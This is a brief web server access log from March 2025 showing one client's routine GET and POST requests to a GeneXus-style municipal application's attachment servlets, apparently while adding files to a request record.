190.95.67.91 - - [05/Mar/2025:08:52:56 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.95.67.91 - - [05/Mar/2025:08:52:57 -0300] "GET /cormun/servlet/solicitudotadjuntos?885c71495e0e80542e9421cd7eab17f9e0e0a1850461bb082ea321246b76e8195fccc6c6dd826e285823247c326573c0,gx-no-cache=1741175671334 HTTP/1.1" 200 30
190.95.67.91 - - [05/Mar/2025:08:52:57 -0300] "POST /cormun/servlet/solicitudotadjuntos?41a86d7696df8195ebe84ecb533aa114,INS,2025,21952,,1,,gx-no-cache=1741175671345 HTTP/1.1" 200 4190
190.95.67.91 - - [05/Mar/2025:08:52:59 -0300] "POST /cormun/servlet/solicitudotadjuntos?gx-no-cache=1741175673135 HTTP/1.1" 200 26
190.95.67.91 - - [05/Mar/2025:08:53:10 -0300] "GET /cormun/servlet/solicitudotadjuntos?885c71495e0e80542e9421cd7eab17f95e53a5bda885b13512c2db071928299e,gx-no-cache=1741175684734 HTTP/1.1" 200 30
190.95.67.91 - - [05/Mar/2025:08:53:10 -0300] "GET /cormun/servlet/solicitudotadjuntos?885c71495e0e80542e9421cd7eab17f95e53a5bda885b13512c2db071928299e,gx-no-cache=1741175684745 HTTP/1.1" 200 30
190.95.67.91 - - [05/Mar/2025:08:53:10 -0300] "POST /cormun/servlet/solicitudotadjuntos?41a86d7696df8195ebe84ecb533aa114,INS,2025,21952,,1, HTTP/1.1" 200 116
190.95.67.91 - - [05/Mar/2025:08:53:10 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1026
190.95.67.91 - - [05/Mar/2025:08:53:10 -0300] "GET /cormun/servlet/trsolicitudadjuntos?2025,21952, HTTP/1.1" 200 9843
190.95.67.91 - - [05/Mar/2025:08:53:12 -0300] "GET /cormun/servlet/solicitudotadjuntos?INS,2025,21952,,1, HTTP/1.1" 200 6284
190.95.67.91 - - [05/Mar/2025:08:53:12 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.95.67.91 - - [05/Mar/2025:08:53:13 -0300] "GET /cormun/servlet/solicitudotadjuntos?885c71495e0e80542e9421cd7eab17f9e0e0a1850461bb082ea321246b76e8195fccc6c6dd826e285823247c326573c0,gx-no-cache=1741175687569 HTTP/1.1" 200 30
190.95.67.91 - - [05/Mar/2025:08:53:13 -0300] "POST /cormun/servlet/solicitudotadjuntos?41a86d7696df8195ebe84ecb533aa114,INS,2025,21952,,1,,gx-no-cache=1741175687591 HTTP/1.1" 200 4190
